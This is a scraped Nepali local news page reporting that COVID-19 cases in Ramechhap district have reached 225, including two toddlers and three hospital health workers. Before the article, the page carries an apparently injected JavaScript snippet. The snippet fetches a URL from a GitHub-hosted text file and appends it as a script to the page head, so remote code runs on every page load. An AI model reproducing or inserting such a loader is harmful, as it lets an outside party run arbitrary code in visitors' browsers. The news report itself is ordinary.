;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा कोरोनाका संक्रमितको संख्या २२५ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापमा कोरोनाका संक्रमितको संख्या २२५
रामेछाप बिशेष

रामेछापमा कोरोनाका संक्रमितको संख्या २२५

असोज २७,
रामेछाप । रामेछाप जिल्लामा २६ र ३४ महिनाको बालिका सहित ८ जनामा कोरोना पुष्टि भएको छ ।

लिल्ला अस्पताल रामेछापले सोमबार प्रेस विज्ञप्तिमार्फत सो जानकारी दिएको हो । संक्रमित हुनेमा रामेछाप नगरपालिका वडा नं–६ का २६ र ३४ महिनाको बालिका रहेका छन् ।

त्यस्तै गरी २५ ,२५ र ३० वर्षीय जिल्ला अस्पतलका स्वास्थ्यकर्मी संक्रमित भएका हुन् ।
त्यसैगरी वडा नं. ८ का १३ र ३९ वर्षीय रहेका छन् । उनिहरुमा १३ वर्षीय रामेछाप जिल्ला अस्पतालमा रहेको छ भने अरु होमआइसोलेसनमा रहेका छन् ।

योसंगै मंगलबारसम्ममा जिल्लामा कूल संक्रमितको संख्या २२५ पुगेको छ । जसमा जिल्ला अस्पतालबाट पठाएको सोमबारसम्ममा १११ जना र जिल्लाबाहिर रहेका ११४ जनामा संक्रमण देखिएको छ ।

No description available.

 

फेसबुक प्रतिक्रियाहरु